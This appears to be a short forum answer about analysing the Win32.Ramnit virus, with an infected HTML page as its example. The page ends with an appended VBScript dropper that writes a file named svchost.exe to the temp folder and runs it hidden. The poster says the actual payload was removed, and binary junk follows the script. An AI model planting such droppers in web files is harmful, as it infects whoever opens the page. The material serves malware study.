You can try analysing the Win32.Ramnit malware.
It infects html files by appending malicious code at the end.
Here is an example from one sample which I analyzed. I have purposely removed the malicious payload which was in WriteData.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.nosteam.ro">
<style type="text/css">
body
{
background-color:#000000;
}
/*]]>*/
</style>
<title>NoSteam.RO</title>
</head>
<body>
</body>
</html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--©ïn�UG�zVhYûÔ¼ÁVP®7nê��Œ•grŸ— s´
/�O�E�*Rœ™ó�Ñð¥®CˆÉÓrIÁQ��o6æ̹lŠÊ,LßX¦ã�ö�µ'Ö53�Ê´<ƒ�2@��ø4‰¹�g
�«ŒpQ�*Eù�q�âmw‰1�ûÅå•q�J-q�ý ŠM¯CA‡Þ HžcU�°òØ[ZZ8Ò'›¤$¼ÐÏ�#Z�� ¦nyûtM¼y_d°Ü!mxgÑ7+r@¬" š'äE¦�¿8y�imMëĶÁ$‰#ð^!ɱè$Œk����»¾_Ç´�'
&D!þ½ÖŽÈ·òü·ýMCŒ¯°�£%�N i�݃ѳiëi”dá3Q‹Ùï¡›eñbGw•˜¯ÂpÕ[ú¤�qƯb�´�•Îï¼´ì}çYÝ3*¨—ÑŠ³²\I�ÛPX�lŠiñ €}Iú¼�µOx5m!;ø‹
`¿âéËiB«Ü¾€»"DûÛ£~°ã“p4�‰j—@«;™–þCG<+³ñƒ
�64®âckÄ� �
p�LM[)ö��á�‹Ù;; ñê�R2ñû�ñê��ñê��ñê�Ø¢L¾Š�RQýê� ñê�-->
